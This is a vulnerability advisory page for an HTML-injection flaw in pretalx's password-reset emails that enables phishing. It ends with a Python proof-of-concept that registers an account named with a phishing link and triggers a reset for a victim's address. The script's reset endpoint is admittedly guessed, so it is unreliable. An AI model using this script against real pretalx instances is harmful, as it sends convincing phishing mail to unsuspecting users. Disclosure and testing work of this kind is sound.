Security Vulnerability Report
CVE-2026-41426 CVSS 6.1 MEDIUM

Published: 2026-04-24 20:16:27
Last Modified: 2026-04-28 18:17:40

Description

pretalx is a conference planning tool. Prior to 2026.1.0, an unauthenticated attacker can send arbitrary HTML-rendered emails from a pretalx instance's configured sender address by embedding malformed HTML or markdown link syntax in a user-controlled template placeholder such as the account display name. The most direct vector is the password-reset flow: the attacker registers an account with a malicious name, enters the victim's email address, and triggers a password reset. The resulting email is delivered from the event's legitimate sender address and passes SPF/DKIM/DMARC validation, making it a ready-made phishing vector. This vulnerability is fixed in 2026.1.0.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Weaknesses
CWE-79, CWE-116

Configurations (Affected Products)

cpe:2.3:a:pretalx:pretalx:*:*:*:*:*:*:*:* - VULNERABLE
pretalx < 2026.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2026-41426
# This script demonstrates how an attacker might register a malicious account.
import requests

target_url = "http://target-pretalx-instance.com"

# Malicious payload using HTML link syntax
malicious_name = '<a href="http://attacker-controlled-site.com/phish">Reset Password</a>'

# Attacker registers an account with the payload
register_data = {
    "email": "[email protected]",
    "name": malicious_name,
    "password": "password123",
    "register": "register"
}

try:
    response = requests.post(f"{target_url}/orga/register/", data=register_data)
    if response.status_code == 200:
        print("[+] Malicious account registered successfully.")
        print("[+] Attacker now triggers password reset for victim's email.")
        # Trigger password reset for victim
        reset_data = {
            "email": "[email protected]"
        }
        # Assuming there is a reset endpoint
        reset_response = requests.post(f"{target_url}/orga/reset/", data=reset_data)
        print("[+] Password reset triggered. Check victim's email for the phishing link.")
    else:
        print("[-] Registration failed.")
except Exception as e:
    print(f"Error: {e}")

References

https://github.com/pretalx/pretalx/security/advisories/GHSA-jm8c-9f3j-4378 (Vendor Advisory)
